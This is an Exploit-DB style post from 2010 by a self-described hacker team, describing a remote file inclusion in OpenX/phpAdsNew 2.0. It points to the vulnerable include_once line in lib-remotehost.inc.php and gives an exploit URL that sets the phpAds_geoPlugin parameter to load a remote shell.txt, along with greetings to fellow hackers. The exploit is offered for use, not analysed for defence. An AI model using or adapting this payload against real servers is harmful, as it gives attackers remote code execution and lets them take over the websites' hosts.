OpenX - 'phpAdsNew' Remote File Inclusion

EDB-ID:

14432

CVE:

N/A




Platform:

PHP

Date:

2010-07-21


# Exploit Title:    OpenX (phpAdsNew) Remote File inclusion Vulnerability
# Date: 2010/07/20
# Author: ViRuS Qalaa
# Email: em9@live.com
# My Sites : www.pal-mafia.com & www.vbspiders.com
# Script url:
http://www.opensourcescripts.com/dir/PHP/Ad_Management/phpadsnew_11.html
# download Script:
http://sourceforge.net/projects/phpadsnew/files/Current%20Release/Openads%202.0.11-pr1/Openads-2.0.11-pr1.zip/download
# Version:2.0
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR >>>X-MaN HaCk3r TeaM
# HaCkEr aRaR: y.0@hotmail.de
:::::::::::::::::::::::::
=================Exploit=================

-=[ vuln c0de ]=-
include_once ($phpAds_geoPlugin);
/libraries/lib-remotehost.inc.php
Line:109

----exploit----

http://
{localhost}/{path}/libraries/lib-remotehost.inc.php?phpAds_geoPlugin==shell.txt?

---------greatz----------
Greatz to :
hacker arar,ViRuS KSA,Q2,Spy-iq

and My friends Others and My friends in MSN
EnJoY o_O